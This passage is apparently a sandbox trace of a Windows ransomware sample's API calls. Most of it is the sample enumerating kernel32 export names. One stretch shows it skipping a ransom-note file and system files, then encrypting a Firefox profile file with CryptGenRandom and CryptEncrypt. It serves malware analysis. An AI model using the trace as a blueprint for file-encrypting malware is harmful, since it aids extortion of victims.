returned="CreateWaitableTimerA" [0081.024] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.024] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.025] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.025] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.025] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.025] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.025] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.025] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.025] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.025] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.025] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.025] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.025] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.025] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.025] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.025] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.025] lstrlenA (lpString="DELETEATOM") returned 10 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.025] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.025] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.025] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.026] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.026] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.026] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.026] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.026] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.026] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.026] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.026] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.026] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.026] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.026] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.026] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.026] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.026] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.026] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.026] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.026] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.026] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.026] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.027] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.027] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.027] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.027] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.027] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.027] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.027] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.027] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.027] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.027] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.027] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.027] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.027] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.027] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.027] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.027] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.027] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.027] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.028] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.028] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 104 [0081.028] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.2fGbR") returned 110 [0081.028] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.2fGbR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.2fgbr"), dwFlags=0x0) returned 1 [0081.029] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.029] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.029] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.029] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4b81e50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4b81e50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b81e50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.ini", cAlternateFileName="EXTENS~1.INI")) returned 1 [0081.029] lstrcmpiW (lpString1="extensions.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0081.029] lstrcmpiW (lpString1="extensions.ini", lpString2="autorun.inf") returned 1 [0081.029] lstrcmpiW (lpString1="extensions.ini", lpString2="boot.ini") returned 1 [0081.029] lstrcmpiW (lpString1="extensions.ini", lpString2="desktop.ini") returned 1 [0081.029] lstrcmpiW (lpString1="extensions.ini", lpString2="ntuser.dat") returned -1 [0081.030] lstrcmpiW (lpString1="extensions.ini", lpString2="iconcache.db") returned -1 [0081.030] lstrcmpiW (lpString1="extensions.ini", lpString2="bootsect.bak") returned 1 [0081.030] lstrcmpiW (lpString1="extensions.ini", lpString2="ntuser.dat.log") returned -1 [0081.030] lstrcmpiW (lpString1="extensions.ini", lpString2="thumbs.db") returned -1 [0081.030] lstrcmpiW (lpString1="extensions.ini", lpString2="Bootfont.bin") returned 1 [0081.030] lstrlenW (lpString="extensions.ini") returned 14 [0081.030] lstrcmpiW (lpString1="ini", lpString2="lnk") returned -1 [0081.030] lstrcmpiW (lpString1="ini", lpString2="exe") returned 1 [0081.030] lstrcmpiW (lpString1="ini", lpString2="sys") returned -1 [0081.030] lstrcmpiW (lpString1="ini", lpString2="dll") returned 1 [0081.030] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.030] lstrlenW (lpString="extensions.ini") returned 14 [0081.030] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.030] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" [0081.030] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.031] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=141) returned 1 [0081.031] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.031] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0081.031] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.031] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.031] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.033] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.033] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0081.034] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.034] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0081.034] CloseHandle (hObject=0x464) returned 1 [0081.034] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.034] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.035] CloseHandle (hObject=0x0) returned 0 [0081.035] CloseHandle (hObject=0x460) returned 1 [0081.035] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.035] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.036] GetTickCount () returned 0x114cbd8 [0081.036] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.036] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.036] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.036] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.036] lstrlenA (lpString="kernel32.dll") returned 12 [0081.037] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.037] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.037] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.037] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.037] lstrlenA (lpString="ADDATOMA") returned 8 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.037] lstrlenA (lpString="ADDATOMW") returned 8 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.037] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.037] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.037] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.037] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.037] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.037] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.037] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.037] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.037] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.037] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.037] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.038] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.038] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.038] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.038] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.038] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.038] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.038] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.038] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.038] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.038] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.038] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.038] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.038] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.038] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: 